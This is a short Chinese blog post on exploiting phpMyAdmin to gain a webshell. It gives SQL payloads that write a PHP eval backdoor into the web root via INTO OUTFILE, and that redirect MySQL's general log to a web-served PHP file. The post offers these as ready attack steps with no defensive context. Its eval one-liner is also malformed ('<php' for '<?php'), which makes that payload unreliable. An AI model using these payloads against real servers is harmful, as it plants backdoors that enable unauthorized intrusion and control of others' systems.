phpmyadmin利用:

1. into outfile 直接在网站目录下写入webshell

首先必要条件是是否有写入的权限web的绝对路径

  • 如何判断当前数据库用户有写权限?
    show variables like '%secure%';

如果secure_file_priv如果非空,则只能在对应的目录下读文件,如果是空即可在其他目录写。
(Linux下默认/tmp目录可写。可以配合文件包含漏洞利用)

使用mysql写一句话:
select '<php eval($_POST[yuaneuro])?>' into outfile 'c:\\shell.php'

2.日志get shell:

  • 前提还是必须有写入的的权限和web的绝对路径,但是不需要当前数据库用户是否有些如权限
  • 原理是通过修改日志文件为webshell

payload

set global general_log = "ON";  # 开启日志记录
show variables like 'general%'; # 查看当前的日志记录
set global general_log_file="C://phpStudy/www/config.php";  # 指定日志文件
select "<?php phpinfo();?>";  # 进行一次查询,查询记录就将写到日志文件中,形成一个webshell
本文作者:Author:     文章标题:phpmyadmin渗透利用
本文地址:https://yuaneuro.cn/archives/259.html     
版权说明:若无注明,本文皆为“yuaneuro的小站”原创,转载请保留文章出处。
Last modification:March 31st, 2021 at 09:54 pm
如果觉得我的文章对你有用,请随意赞赏